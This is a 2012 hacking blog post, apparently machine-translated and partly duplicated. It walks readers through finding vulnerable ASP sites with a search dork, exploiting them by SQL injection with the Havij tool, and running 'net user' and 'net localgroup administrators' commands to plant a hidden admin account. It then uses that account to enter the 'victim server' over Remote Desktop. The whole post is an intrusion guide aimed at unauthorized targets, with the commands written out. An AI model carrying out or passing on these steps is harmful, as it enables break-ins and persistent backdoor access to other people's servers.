New Post

Friday, October 5, 2012

Hi guy's. I created this simple tutor \ wkwkwkwk ..
OK, not only we control the web with Shell either b374k or lotus, or whatever name shellnya, we can also use the default Windows feature Remote Desktop, it's just that we still need to know the username and password for access to the server forced.dan we do technique Sql Injection and the username and password the victim is not necessarily the same to login to computer, LHA should continue to do?? we can use Havij for itu.materials are:

Dork.saya use Dork inurl :/ *. Asp? Id =
Havij
internet connection
patience to look for victims



Ok, I assume all peers are dapet victims and use Havij dah scanned, then we select the CMD icon at Havij and in that column we select the "net user (name of favorite login) (password) / add" and we click "execute"



Ok, I assume all peers are dapet victims and use Havij dah scanned, then we select the CMD icon at Havij and in that column we select the "net user (name of favorite login) (password) / add" and we click "execute"

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm




if you've done we select the "net localgroup administrators (login name preference) / add" and again click "execute"



DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm


The first task, then we open the windows of his facility, which is a remote desktop, how to start-all-accessories-remote program on the desktop, and then we put our target ip and click connect, wait a moment until a connection is made ..


DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm



then enter the username and password that we've created earlier ..

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm





and tadaaa .. we got into the victim server



DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm







Here Using Comand Shell hosted in Windows

1. Make sure you can access the web administrator, how:
code:

Quote:
net user
if you access the administrator it will show an example of this kind
code:
User accounts for \ \

Quote:
-------------------------------------------------- -----------------------------
administrator
Support_388945a0 tom1983
The command completed with one or more errors.
Adding users, here I use the user name bery
code:
Quote:
bery net user / add
Changing user with Administrator access bery
code:
Quote:
bery net localgroup administrators / add
We create a password
code:
Quote:
net user bery 1234

Okay, then you open the Remote Desktop Connection that is in your windows, well because I'm using Windows XP it was located in
code:
Quote:
Start - All Programs - Accessories - Remote Desktop Connection
all done

0 nhận xét:

Post a Comment